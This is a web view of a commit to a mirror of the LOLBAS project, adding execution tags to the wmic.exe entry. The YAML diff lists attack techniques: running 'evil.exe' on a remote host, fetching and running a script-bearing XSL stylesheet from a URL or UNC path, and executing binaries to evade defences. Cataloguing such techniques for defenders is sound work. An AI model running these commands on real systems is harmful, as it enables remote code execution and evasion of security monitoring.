public-mirrors/LOLBAS
1
0
Fork 0
mirror of https://github.com/LOLBAS-Project/LOLBAS synced 2024-12-30 16:54:00 +01:00
Code Issues Projects Releases Wiki Activity

Update Wmic.yml Tags

Browse Source 
Added Tags:
Execute: EXE
Execute: Remote
Execute: XSL
This commit is contained in:
hegusung 2024-10-13 17:31:47 +02:00 committed by GitHub
parent e792f14b9a
commit 6959072271
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 12 additions and 1 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

13
yml/OSBinaries/Wmic.yml
View File

@ -11,6 +11,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1564.004 MitreID: T1564.004
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: EXE
- Command: wmic.exe process call create calc - Command: wmic.exe process call create calc
Description: Execute calc from wmic Description: Execute calc from wmic
Usecase: Execute binary from wmic to evade defensive counter measures Usecase: Execute binary from wmic to evade defensive counter measures
@ -18,6 +20,8 @@ Commands:
Privileges: User Privileges: User
MitreID: T1218 MitreID: T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: EXE
- Command: wmic.exe /node:"192.168.0.1" process call create "evil.exe" - Command: wmic.exe /node:"192.168.0.1" process call create "evil.exe"
Description: Execute evil.exe on the remote system. Description: Execute evil.exe on the remote system.
Usecase: Execute binary on a remote system Usecase: Execute binary on a remote system
@ -25,6 +29,9 @@ Commands:
Privileges: User Privileges: User
MitreID: T1218 MitreID: T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: EXE
- Execute: Remote
- Command: wmic.exe process get brief /format:"https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/Wmic_calc.xsl" - Command: wmic.exe process get brief /format:"https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/Wmic_calc.xsl"
Description: Create a volume shadow copy of NTDS.dit that can be copied. Description: Create a volume shadow copy of NTDS.dit that can be copied.
Usecase: Execute binary on remote system Usecase: Execute binary on remote system
@ -32,6 +39,9 @@ Commands:
Privileges: User Privileges: User
MitreID: T1218 MitreID: T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: XSL
- Execute: Remote
- Command: wmic.exe process get brief /format:"\\127.0.0.1\c$\Tools\pocremote.xsl" - Command: wmic.exe process get brief /format:"\\127.0.0.1\c$\Tools\pocremote.xsl"
Description: Executes JScript or VBScript embedded in the target remote XSL stylsheet. Description: Executes JScript or VBScript embedded in the target remote XSL stylsheet.
Usecase: Execute script from remote system Usecase: Execute script from remote system
@ -40,7 +50,8 @@ Commands:
MitreID: T1218 MitreID: T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags: Tags:
- Execute: WSH - Execute: XSL
- Execute: Remote
- Command: wmic.exe datafile where "Name='C:\\windows\\system32\\calc.exe'" call Copy "C:\\users\\public\\calc.exe" - Command: wmic.exe datafile where "Name='C:\\windows\\system32\\calc.exe'" call Copy "C:\\users\\public\\calc.exe"
Description: Copy file from source to destination. Description: Copy file from source to destination.
Usecase: Copy file. Usecase: Copy file.